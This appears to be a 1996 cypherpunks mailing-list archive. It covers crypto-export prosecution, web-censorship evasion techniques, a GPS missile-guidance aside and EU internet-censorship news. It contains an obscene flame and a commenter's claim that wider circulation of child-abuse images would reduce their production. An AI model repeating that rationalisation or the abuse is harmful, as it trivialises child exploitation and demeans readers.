> > > the one I took to Europe."   "Oh, you say this laptop has PGP 5.9 on it?
> > > So? I installed it last week. My trip to Europe was last summer.")
> > 
> > So now you, as your own lawyer (apparently) have decided to take the 
> > stand and testify.  Remember that the prosecutor gets to cross-examine 
> > you.  Things are about to get ugly.... 
> > 
> > 
> > > 
> > > >Considering the headaches required for airline travel today, it's not like
> > > >there aren't serious records abound.
> > > 
> > > Such as? I recall no inspections of my luggage, no inventorying of the
> > > serial numbers of my laptops, no inspection whatsoever of my
> > > magneto-optical drives (which were in my carry-on luggage, and not even
> > > glanced at, in the box they were in). X-rays would not prove what was taken
> > > in or out of the country, even if "x-ray escrow" were implemented (which it
> > > is not, according to all reports I have heard, and based on some practical
> > > limits on storage), I doubt the records of a trip, say, last summer (of
> > > '95) could be retrieved and prove that a particular laptop was taken out.
> > > Not to mention that the software allegedly taken out might have been on any
> > > kind of media, none of them distinguishable with an x-ray machine.
> > 
> > Circumstantial evidence is admissible if probative of a fact at issue in 
> > the case.  Evidence that you took a laptop out of the country is 
> > probative of the allegation that you exported crypto using a laptop.
> > 
> > 
> > 
> > > >For crying outloud, he admitted to the world that he took the software
> > > >out.  I put that in front of a jury and it looks just like the typical
> > > 
> > > "For crying out loud" is bluster, not legal argument.
> > 
> > And your understanding of evidence shows a misunderstanding of how the 
> > rules of evidence actually work in a courtroom. 
> > 
> > 
> > > >stupid bragging criminal.  Any defense about "I was just kidding" or "The
> > > >message was forged" might be interesting, but it will sound like
> > > >technical-mumbo-jumbo to a jury.  Yes, it would convince >ME< that was a
> > > 
> > > Legal proof is still needed. Given only a nebulous statement like "I
> > > exported crypto in violation of the ITARs," or "I shipped PGP to Europe,"
> > > is not enough for a case even to be brought to trial.
> > 
> > You are absolutely wrong.  It may not be enough for a conviction, but it 
> > will beat a Rule 29 motion (Motion for a judgment of acquittal) and get 
> > the case to the jury.
> > 
> > > (If it reached trial, I would expect a defense attorney to move for
> > > dismissal. Absent any evidence that a crime occurred, absent any proof
> > > beyond the nebulous hearsay statement of a "braggart," there is simply no
> > > basis for criminal action.)
> > > 
> > > "Stupid bragging criminals" may be common, but bragging is not in and of
> > > itself illegal. There still has to be evidence of a crime.
> > 
> > Must a jury believe that you were "just bragging" because you now, in a 
> > criminal trial, say that you were? 
> > 
> > 
> > > "Produce the body."
> > 
> > Perry Mason is only active in re-runs.
> > 
> > > 
> > > (I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the
> > > body, or witnesses, does this mean I'll be found guilty? To use BU's
> > > phrasing, "for crying out loud.")
> > 
> > That's where prosecutorial discretion comes in and a judge's and jury's 
> > common sense comes in if the prosecutor runs amok.
> > 
> > BTW, I am far more willing to believe you were bragging about whacking 
> > Jimmy Hoffa than about exporting crypto.  Think of all the interesting 
> > evidence from this mailing list's archives that prosecutors would attempt 
> > to introduce against you ...
> > 
> > Not to say that *I* couldn't get you off, but not the way you propose.
> > 
> > EBD
> > 
> > 
> > 
> > > --Tim May
> > > 
> > > We got computers, we're tapping phone lines, I know that that ain't allowed.
> > > ---------:---------:---------:---------:---------:---------:---------:----
> > > Timothy C. May              | Crypto Anarchy: encryption, digital money,
> > > tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> > > W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> > > Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> > > "National borders aren't even speed bumps on the information superhighway."
> > > 
> > > 
> > > 
> > > 
> > > 
> > 
> 
> 
> YEAH FUCK YOU.. YOUR ALL FUCKING STUPID ... DONT FUCKIN WRITE THIS SHIT..
> YER ALL DUMB STUPID LITTLE 5 YEAR OLDS WHO KNOW JACK SHIT.. GET OFF THE
> FUCKIN SUBJECT YOU LAME ASS WHOREs.. FUCKIN YOU WANT A REAL FELONY.. TRY
> TO HACK MY SYSTEM... THIS SYTEM CANNOT BE HACKED IF YOU GET ROOT I GIVE
> YOU PERMISSION TO NUKE MY SYS.. FUCK YOU BASTARDS... STUPID NUTSAKCS.
> 
> 


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It's better to be thought a fool, then to open your mouth and
			   prove it.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   A mind is like a parachute, it only works when it is open.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-----------------------------------------------------------------
Gerard D. Cochrane Jr.
Software System Specialist II
Systems Programmer
University of Texas at El Paso
Phone: (915) 747-5256
Fax: (915) 747-5067
E-mail: gdcochra@mail.utep.edu

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBtAzFsQbcAAAEDAKaA49HDrO1mQQiC1YZ1WqXxggOmd98l2ArWyWLi64XUzyQp
JgVdv0svCAoFLj0UDQ5iqsWkznZXD4di8exS0Bq+1C/dXacEPwiQMR28gF3+ATxD
kw0UAW22cbNE7KxgRQAFEbQIZ2Rjb2NocmE=
=3OP7
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Sep 1996 09:59:21 +0800
To: cypherpunks@toad.com
Subject: [SPAM] More fan mail from Timmy "peteur" May
In-Reply-To: <844008901.9441.0@fatmans.demon.co.uk>
Message-ID: <FFi2uD82w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


What has Timmy been smoking?

]From paul@fatmans.demon.co.uk  Sun Sep 29 19:03:40 1996
]Received: by bwalk.dm.com (1.65/waf)
]	via UUCP; Sun, 29 Sep 96 19:14:06 EDT
]	for dlv
]Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
]        id AA25790 for dlv@bwalk.dm.com; Sun, 29 Sep 96 19:03:40 -0400
]Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ac16129;
]          29 Sep 96 15:59 BST
]Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
]           id aa09441; 29 Sep 96 15:54 BST
]Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP
]	id AA843903697 ; Sat, 28 Sep 96 09:41:37 +0000
]Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
]From: paul@fatmans.demon.co.uk
]To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
]Date: Sat, 28 Sep 1996 09:21:37 +0000
]Mime-Version: 1.0
]Content-Type: text/plain; charset=US-ASCII
]Content-Transfer-Encoding: 7BIT
]Subject: Re: Possible subs attack????
]Priority: normal
]X-Pm-Encryptor: JN-PGP-P, 4
]X-Mailer: Pegasus Mail for Windows (v2.31)
]Message-Id: <844008901.9441.0@fatmans.demon.co.uk>
]
]-----BEGIN PGP SIGNED MESSAGE-----
]
]
]> The lying sack of shit Timmy May <paul@fatmans.demon.co.uk> writes:
]
]> The lying sack of shit Timmy May lies again, as usual.
]
]Fuck you,
]
]I am not Tim May, Check out the return path if you don`t believe me,
]if you still don`t here`s my PGP public key signed by the EFF, they
]don`t sign keys here and there without checking ID`s...
]
]Type Bits/KeyID    Date       User ID
]pub  1024/5BBFAEB1 1996/07/30 Paul Bradley <paul@fatmans.demon.co.uk>
]
]- -----BEGIN PGP PUBLIC KEY BLOCK-----
]Version: 2.6.3ia
]
]mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
]6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
]sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
]tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
]NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
]Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
]j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
]C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
]9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
]En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
]YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
]put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
]LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
]mUqFH41Z7NkyO8ZFdi5GGX0=
]=CMZA
]- -----END PGP PUBLIC KEY BLOCK-----
]
]
]
]-----BEGIN PGP SIGNATURE-----
]Version: 2.6.3ia
]Charset: cp850
]
]iQCVAwUBMkzuH75OPIRbv66xAQHSmQQAqw0F/lIsCcQwOpiSQDx4hMqOVVUVXbyR
]3RMWY20ECE0TpAtJ6hkAiqphsWUSBqiFj2kGHMh+jHSHXIMPF+m1qtwVbgutJC7B
]8VYWj0VP+bGu5dEUisLrVHDNj5ucEIDyK2GnqObiCiKARFUbOuZnMQOp9TDJqibh
]2Wqa5+h8R7g=
]=/M2U
]-----END PGP SIGNATURE-----
]
]  Datacomms Technologies web authoring and data security
]       Paul Bradley, Paul@fatmans.demon.co.uk
]  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org
]       Http://www.cryptography.home.ml.org/
]      Email for PGP public key, ID: 5BBFAEB1
]     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Sep 1996 13:30:12 +0800
To: cypherpunks@toad.com
Subject: Tools for Rendering Censorship Firewalls Ineffective
Message-ID: <199609300259.TAA04617@dfw-ix8.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying to categorize the web censorship techniques available
to governments, such as Singapore and China's Firewall Curtains,
Germany's ISP Threats, etc.  The objective is to make information widely
and conveniently available to subjects of the censoring country
by building tools that will provide multiple paths to data that
are easy to find and hard to block because they're too pervasive.

I'm assuming that email is difficult to block, in-country public websites 
are blockable (through business licenses, lawsuits, rubber-hoses, or 
confiscation), in-country private websites are difficult to block but not 
very relevant, authors can afford and post to foreign web sites without 
effective blocking, and that the real "threat" to the government is foreign 
websites making banned information conveniently available to its subjects. 
I'm also assuming that the government can use humans to discover a moderate
quantity of banned info, but that blocking will mostly be done by bots rather
than human readers.  In particular, I'm ignoring the approach of
in-country hidden websites, since it's too vulnerable in some countries,
and focussing on the web rather than email because it's mass-market and
easier to use, and email is harder to stop, especially given crypto and
remailers.

Notation: "Attack" is the Censors trying to stop data; "defend" and "evade"
are the Good Guys trying to not get censored.

The obvious techniques I can see include
1) Filter on IP address (e.g. German attack on XS4ALL)
2) Filter on DNS Name
3) Filter on Patterns in URL
4) Filter on Patterns in PUT/GET Requests
5) Filter on Patterns in Response.
6) Traffic Analysis on reading patterns

Defenses -
The most important defenses to these attacks depend on ubiquity and volume -
they can block one or two of anything, they might be able to block a thousand,
and it's not possible to block millions of things everywhere.
So building bridges between systems and increasing multiplicity is a win.

1) It's easy to evade the crude version of this attack - use rolling IP
addresses, and use DNS to publish the new ones.  For the German model,
where the government has to tell the ISPs who to block, this wins.
They can counter by blocking your whole IP network, not just a single 
machine, which you can counter by hopping IP networks as well as hosts,
though that's more trouble (and blocking routes is probably easier
than blocking hosts, since you do it at the routers, and harder to
get people to turn back on.)  They can also enforce boycotts on the ISP,
as they did with XS4ALL - blocking most of the traffic to a site
can affect its other traffic enough to be economically annoying.

The attackers can counter by also tracking the address with a bot -
if you change addresses hourly, they can change blocking addresses hourly,
which may workable for somewhere high-tech like Singapore or very focussed
like China, but isn't very effective for somewhere porous like Germany
that has a system of laws that move at the speed of bureaucracy.

A very effective defense against this method is to deploy relay servers,
either anonymizers or simple non-anonymizing cgi scripts that take URLs like
     http://foo.bar.com/cgi-bin/relay.pl/http://banned.site.org/
and fetch and return the real URL (perhaps modifying any URLs in it
to connect through the relay.)  This works if there are lots of easy-to-find
relay servers.  An obvious approach would be to package the relay program with
Apache or other popular web server, so anybody who didn't bother turning it off
would have a relay named "relay.pl"; the attackers can't realistically block
everybody who's got one.

Another effective defense is to use web servers that gateway to AFS 
(Andrew File System) or other distributed file systems.  This lets 
        /stanford.edu/censored-mirrors/banned.html
be accessible from any site supporting AFS, such as
        http://www.cmu.edu/afs/stanford.edu/censored-mirrors/banned.html
This has the great advantage that AFS sites are usually at
major universities, which are important enough that lots of people
would complain if you blocked them.
This works better if there's an easy way to insert things into
the AFS tree - volunteers are fine, but if there are servers that
can automatically import material it becomes easier, either by
copying or by various kinds of indirection.  (On the other hand,
if you allow automated import, attackers can turn your site
into the Child Pornography NarcoTerrorist Bomb Info Mart and ban you...)

Do the major web crawlers index AFS?  Or do the sites use robots.txt
to prevent multiple crawls, e.g. by only allowing searching on the
local file systems and not on the remote ones?

2) Filtering on DNS names is an attack that proxy servers can use -
the HTTP spec [RFC1945] says that requests to proxies need to send
an Absolute URI (method://machine[:port][abs_path]) rather than
just the absolute path (/etc.), so the proxy servers can filter on DNS names,
defeating the rolling-IP-address defense.  Doesn't stop relays.

Non-proxy attacks don't have access to this method.  However, governments 
that use full-scale firewalls and not just http proxies can also restrict 
what DNS queries the National DNS Servers will pass.

How to defend against it for non-proxy attackers?  One way is to make it
easy to find the IP address of a server with banned material -
web indexers can find everything, so putting the IP form of the URL in 
a file that the popular indexers, along with useful keywords, 
is one way to make sure you get found.  Another would be to deploy
DNS servers widely (done:-) and maybe form-based interfaces
for users that will run Dig or whatever.  

3) Filtering on patterns in URLs - as with DNS filters, a proxy server
run by an attacker can block access based on patterns in the URL,
such as relay.pl.  This makes it tougher to use relays as a defense,
because they either need to have different names on different machines
(harder for users to find and for administrators to implement without
having to pay attention), or else to not need a name (either modify
the protocols or at least the servers so that
        http://foo.bar.com/http://banned.site.org/stuff.html
gets handled properly.)  The latter is doable, but probably
requires more administrator support?  

Pattern matching on URLs can make it easier to attack AFS -
you don't need to kill the whole AFS tree, just the banned parts.

Pattern matching on URLs already starts to have heavy volume issues -
can a proxy server take the extra time to search an ever-larger
banned list on every web hit?  Having used overloaded proxy servers
at work (:-), I'd expect the population to start acting like
disgruntled postal workers if the mandatory national firewall
is underpowered.  On the other hand, I suppose a government could
partially solve scale problems by requiring a license fee for
use of the proxy server; a few bucks per user could pay for
increasing numbers of servers as well as tracking who's reading what.

4) Filter on Patterns in PUT/GET Requests
As a defense against blocking URLs by patterns, defenders can
send requests as message-body in PUT/GET requests; this is also
useful for submitting banned material to cooperative sites.
Attackers can filter on this material, though they can't easily filter out
SSL or S-HTTP requests by content, depending on how much the protocols
pass material end-to-end rather than link-by-link where the proxy
can see it.

5) Filter on Patterns in Responses.
Similarly, attackers could just grep for banned material in HTTP responses,
though SSL/S-HTTP both interfere with this.  Defenders can also structure
banned writing in ways that don't trigger patterns easily (e.g. don't
refer to Lee Kwan Yew, just refer to That Bum or Mr. Big, etc.)
Filtering on picture content is obviously difficult, so including
text in graphics can help prevent attacks.  In general, I'd expect
filtering attacks to be extremely susceptible to volume.

On the other hand, attackers don't have to filter in real-time;
they could scan material as a background activity, and go arrest
the people who have received contraband after the fact,
or just block their National Firewall Passports if they're reading
too much.  In general, this attack is probably more useful for
overall study of what their subjects are reading than for real-time.

6) Traffic Analysis - who's reading what?  Where?  Who's reading a
lot of contraband?  What's popular foreign material?  Which of
the attackers' subjects are possible fellow travellers, based on
what they're reading?  This kind of material is useful for marketing
as well as for identifying malcontents - businesses aren't always
pro-privacy either, though they want their own secrets kept secret.
Many of the attacks above can work as after-the-fact analysis
more effectively than they can as real-time blocking, and volume
is less of a problem for crunching a sample of firewall logs
than for active blocking; this may be the hardest attack to counter,
though it's repression rather than censorship.  If you can't police
everybody, you can at least encourage the policeman in everybody's head.
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

What other kinds of attacks are there?  What other defenses?
What kinds of holes are there in these defenses?




#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 30 Sep 1996 13:45:11 +0800
To: cypherpunks@toad.com
Subject: Tools for Rendering Censorship Firewalls Ineffective
Message-ID: <199609300305.UAA03732@netcomsv.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been trying to categorize the web censorship techniques available
to governments, such as Singapore and China's Firewall Curtains,
Germany's ISP Threats, etc.  The objective is to make information widely
and conveniently available to subjects of the censoring country
by building tools that will provide multiple paths to data that
are easy to find and hard to block because they're too pervasive.

I'm assuming that email is difficult to block, in-country public websites 
are blockable (through business licenses, lawsuits, rubber-hoses, or 
confiscation), in-country private websites are difficult to block but not 
very relevant, authors can afford and post to foreign web sites without 
effective blocking, and that the real "threat" to the government is foreign 
websites making banned information conveniently available to its subjects. 
I'm also assuming that the government can use humans to discover a moderate
quantity of banned info, but that blocking will mostly be done by bots rather
than human readers.  In particular, I'm ignoring the approach of
in-country hidden websites, since it's too vulnerable in some countries,
and focussing on the web rather than email because it's mass-market and
easier to use, and email is harder to stop, especially given crypto and
remailers.

Notation: "Attack" is the Censors trying to stop data; "defend" and "evade"
are the Good Guys trying to not get censored.

The obvious techniques I can see include
1) Filter on IP address (e.g. German attack on XS4ALL)
2) Filter on DNS Name
3) Filter on Patterns in URL
4) Filter on Patterns in PUT/GET Requests
5) Filter on Patterns in Response.
6) Traffic Analysis on reading patterns

Defenses -
The most important defenses to these attacks depend on ubiquity and volume -
they can block one or two of anything, they might be able to block a thousand,
and it's not possible to block millions of things everywhere.
So building bridges between systems and increasing multiplicity is a win.

1) It's easy to evade the crude version of this attack - use rolling IP
addresses, and use DNS to publish the new ones.  For the German model,
where the government has to tell the ISPs who to block, this wins.
They can counter by blocking your whole IP network, not just a single 
machine, which you can counter by hopping IP networks as well as hosts,
though that's more trouble (and blocking routes is probably easier
than blocking hosts, since you do it at the routers, and harder to
get people to turn back on.)  They can also enforce boycotts on the ISP,
as they did with XS4ALL - blocking most of the traffic to a site
can affect its other traffic enough to be economically annoying.

The attackers can counter by also tracking the address with a bot -
if you change addresses hourly, they can change blocking addresses hourly,
which may workable for somewhere high-tech like Singapore or very focussed
like China, but isn't very effective for somewhere porous like Germany
that has a system of laws that move at the speed of bureaucracy.

A very effective defense against this method is to deploy relay servers,
either anonymizers or simple non-anonymizing cgi scripts that take URLs like
     http://foo.bar.com/cgi-bin/relay.pl/http://banned.site.org/
and fetch and return the real URL (perhaps modifying any URLs in it
to connect through the relay.)  This works if there are lots of easy-to-find
relay servers.  An obvious approach would be to package the relay program with
Apache or other popular web server, so anybody who didn't bother turning it off
would have a relay named "relay.pl"; the attackers can't realistically block
everybody who's got one.

Another effective defense is to use web servers that gateway to AFS 
(Andrew File System) or other distributed file systems.  This lets 
        /stanford.edu/censored-mirrors/banned.html
be accessible from any site supporting AFS, such as
        http://www.cmu.edu/afs/stanford.edu/censored-mirrors/banned.html
This has the great advantage that AFS sites are usually at
major universities, which are important enough that lots of people
would complain if you blocked them.
This works better if there's an easy way to insert things into
the AFS tree - volunteers are fine, but if there are servers that
can automatically import material it becomes easier, either by
copying or by various kinds of indirection.  (On the other hand,
if you allow automated import, attackers can turn your site
into the Child Pornography NarcoTerrorist Bomb Info Mart and ban you...)

Do the major web crawlers index AFS?  Or do the sites use robots.txt
to prevent multiple crawls, e.g. by only allowing searching on the
local file systems and not on the remote ones?

2) Filtering on DNS names is an attack that proxy servers can use -
the HTTP spec [RFC1945] says that requests to proxies need to send
an Absolute URI (method://machine[:port][abs_path]) rather than
just the absolute path (/etc.), so the proxy servers can filter on DNS names,
defeating the rolling-IP-address defense.  Doesn't stop relays.

Non-proxy attacks don't have access to this method.  However, governments 
that use full-scale firewalls and not just http proxies can also restrict 
what DNS queries the National DNS Servers will pass.

How to defend against it for non-proxy attackers?  One way is to make it
easy to find the IP address of a server with banned material -
web indexers can find everything, so putting the IP form of the URL in 
a file that the popular indexers, along with useful keywords, 
is one way to make sure you get found.  Another would be to deploy
DNS servers widely (done:-) and maybe form-based interfaces
for users that will run Dig or whatever.  

3) Filtering on patterns in URLs - as with DNS filters, a proxy server
run by an attacker can block access based on patterns in the URL,
such as relay.pl.  This makes it tougher to use relays as a defense,
because they either need to have different names on different machines
(harder for users to find and for administrators to implement without
having to pay attention), or else to not need a name (either modify
the protocols or at least the servers so that
        http://foo.bar.com/http://banned.site.org/stuff.html
gets handled properly.)  The latter is doable, but probably
requires more administrator support?  

Pattern matching on URLs can make it easier to attack AFS -
you don't need to kill the whole AFS tree, just the banned parts.

Pattern matching on URLs already starts to have heavy volume issues -
can a proxy server take the extra time to search an ever-larger
banned list on every web hit?  Having used overloaded proxy servers
at work (:-), I'd expect the population to start acting like
disgruntled postal workers if the mandatory national firewall
is underpowered.  On the other hand, I suppose a government could
partially solve scale problems by requiring a license fee for
use of the proxy server; a few bucks per user could pay for
increasing numbers of servers as well as tracking who's reading what.

4) Filter on Patterns in PUT/GET Requests
As a defense against blocking URLs by patterns, defenders can
send requests as message-body in PUT/GET requests; this is also
useful for submitting banned material to cooperative sites.
Attackers can filter on this material, though they can't easily filter out
SSL or S-HTTP requests by content, depending on how much the protocols
pass material end-to-end rather than link-by-link where the proxy
can see it.

5) Filter on Patterns in Responses.
Similarly, attackers could just grep for banned material in HTTP responses,
though SSL/S-HTTP both interfere with this.  Defenders can also structure
banned writing in ways that don't trigger patterns easily (e.g. don't
refer to Lee Kwan Yew, just refer to That Bum or Mr. Big, etc.)
Filtering on picture content is obviously difficult, so including
text in graphics can help prevent attacks.  In general, I'd expect
filtering attacks to be extremely susceptible to volume.

On the other hand, attackers don't have to filter in real-time;
they could scan material as a background activity, and go arrest
the people who have received contraband after the fact,
or just block their National Firewall Passports if they're reading
too much.  In general, this attack is probably more useful for
overall study of what their subjects are reading than for real-time.

6) Traffic Analysis - who's reading what?  Where?  Who's reading a
lot of contraband?  What's popular foreign material?  Which of
the attackers' subjects are possible fellow travellers, based on
what they're reading?  This kind of material is useful for marketing
as well as for identifying malcontents - businesses aren't always
pro-privacy either, though they want their own secrets kept secret.
Many of the attacks above can work as after-the-fact analysis
more effectively than they can as real-time blocking, and volume
is less of a problem for crunching a sample of firewall logs
than for active blocking; this may be the hardest attack to counter,
though it's repression rather than censorship.  If you can't police
everybody, you can at least encourage the policeman in everybody's head.
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

What other kinds of attacks are there?  What other defenses?
What kinds of holes are there in these defenses?




#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 30 Sep 1996 13:09:07 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: GPS and other Dual-use technologies
In-Reply-To: <v02130502ae740149c98b@[10.0.2.15]>
Message-ID: <Pine.3.89.9609292030.A27834-0100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain





On Sun, 29 Sep 1996, Steve Schear wrote:

> Craft are free to use any navigational technology, but must be autonomous
> from launch to delivery.  To aid navigation I was considering the design of
> a substitute differential GPS beacon functionally interchangable with those
> offered by the USCG.  My device would work on a different frequency,
> possibly using very wideband direct sequence spread spectrum (for low
> probability of intercept/detection) and be actuated by the missile as it
> neared the target in order to refine its position.

While in St. Louis on business, I talked with two guys writing the 
operations manual for a new Navy missile built by a local defense 
contractor. The missile was using GPS for targeting.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 30 Sep 1996 10:35:30 +0800
To: cypherpunks@toad.com
Subject: European Censorship Proposals
Message-ID: <01IA2ANWJV3K8Y56RA@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>     _________________________________________________________________
>   Centura
>     _________________________________________________________________
>                  EURO-COMMISSION TO TACKLE PORN ON INTERNET
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   BRUSSELS (Sep 24, 1996 08:06 a.m. EDT) - The European Commission,
>   faced with calls to clamp down on use of the Internet to transmit
>   pornography following a Belgian paedophilia scandal, will take a first
>   step in October towards seeing how it can be done.
   
>   But Culture Commissioner Marcelino Oreja, who intends to unveil a
>   discussion paper on new media services on October 9, says that the
>   process will be a lengthy one in consultation with all concerned and
>   that at the end of the day a world solution could be needed.
   
[...]

>   "We have to find mechanisms to see first how we can find the author
>   who includes this pornography in the Internet and second how we can
>   encrypt the content of these messages," he said.
   
>   The call for a European-wide solution to pornography and paedophilia
>   on the Internet is expected to be a central theme for EU justice
>   ministers in Dublin on Thursday and Friday when they discuss ways of
>   fighting the child sex trade.
   
>   EU culture ministers could also discuss it at their own meeting in the
>   Irish town of Galway on Wednesday.
   
>   The discovery of four murdered girls in Belgium and a child murder,
>   prostitution and pornography ring has focused the world's attention on
>   the child sex trade and fuelled calls for a clamp down on the
>   Internet, which at the moment is little policed and where anonymity is
>   assured.
   
>   Oreja said among the options raised in the discussion paper were the
>   possibility of encrypting access so that only those who pay could see
>   the material, or including a special computer chip -- commonly known
>   as a V-chip -- to screen against pornographic content.

	The obvious solution to this is someone in an unregulated country
getting a couple chips or programs for the de-encryption, then making the
images/text/whatever freely available. The major hurdles for this are A.
digital watermarking to see which chip(s) are used then block their
ability to be used (a reason to get more than one chip/program so as to
compare to filter out the watermarking - some techniques for watermarking
will survive this, but most won't) and B. copyright laws in the countries
which do not enforce such provisions.
   
[...]
   
>   Oreja, aware that Internet servers can simply move to a neighbouring
>   country to get round any restrictions agreed at European level, said
>   problems with satellite television had shown that national and
>   European regulations were not enough.
   
>   "We know that national regulation is not enough, that European
>   regulation is not enough...We may need to have a world regulation of
>   these matters, but let's go step by step. We do not have a European
>   regulation," he said.

	If they seriously think this will happen, they need to take another
look at the international situation.
   
>   The idea of a professional code of ethics in which the media would
>   regulate themselves is acknowledgment that European regulation of the
>   Internet could face opposition on freedom of information grounds.
   
>   "I think everything can not be said. I think that violence can have
>   its limits, I think that pornography can have its limits. I am in
>   favour of that, but it can be that the sector itself prepares a code
>   of ethics," he said.

	That's funny, if I were in favor of any censorship it would be of
government propaganda such as this.... they seem to be calling for violence
on a rather frequent basis.
  
>   He said such a code could help get round wide differences between EU
>   member countries, who have widely differing laws on what can be
>   considered pornography and eroticism.
   
>    Copyright &copy 1996 Nando.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 30 Sep 1996 10:43:45 +0800
To: cypherpunks@toad.com
Subject: More on European Censorship
Message-ID: <01IA2ASHUV7O8Y56RA@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>     _________________________________________________________________
>   webslingerZ
>     _________________________________________________________________
>                 EU TO ACT AGAINST INTERNET CHILD EXPLOITATION
>   __________________________________________________________________________
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Reuter Information Service
      
>   BRUSSELS (Sep 29, 1996 00:12 a.m. EDT) - European Union
>   telecommunications ministers, reacting to a child-sex scandal in
>   Belgium, pledged Friday to consider ways to keep illegal material that
>   could harm children off the Internet.
   
>   Belgian Telecommunications Minister Elio Di Rupo announced that his
>   government planned to implement new measures requiring Internet access
>   providers to monitor and report material featuring sexual abuse or
>   exploitation of children.
   
>   He asked his colleagues to join forces with him.
   
>   "Today a big legal vacuum exists, for legislation is falling behind
>   technological evolution," he said, according to a speaking note that
>   was distributed to reporters.
   
>   "There is a big risk that it will create an enormous market of
>   children fed on by criminals."

	Market? Wider distribution of such pictures will lead to _decreased_
production, for the simple reason that the producers won't be able to go to
courts for stopping copyright violations, so they can't make any money.
   
>   The ministers agreed to expand a working party that has already been
>   set up to look at the question of illegal material on the Internet and
>   asked it to come up with concrete proposals before they meet again in
>   November.
   
>   The group will include representatives of the 15 EU telecoms
>   ministries and of companies that provide access to online services or
>   prepare the content, a statement adopted by the ministers said.
   
[...]

>   But some of the telecoms ministers, including those from Britain and
>   Sweden, warned that the EU could not wander into censorship and had to
>   focus on fighting truly illegal material.
   
>   British Science and Technology Minister Ian Taylor advocated a
>   self-regulatory system that was announced in his country earlier this
>   week.
   
>   Two British trade associations announced that an independent body, the
>   Safety Net Foundation, would be established to rate material carried
>   on the Internet and to set up a "hotline" service to receive
>   complaints about illegal material.
   
>   They said Internet service providers would also adopt policies for
>   removing illegal material and reducing the scope for subscribers to
>   act with untraceable anonymity.

	I suspect that any anonymous remailers operating in Britain may want
to look out for ISP interruptions...
   
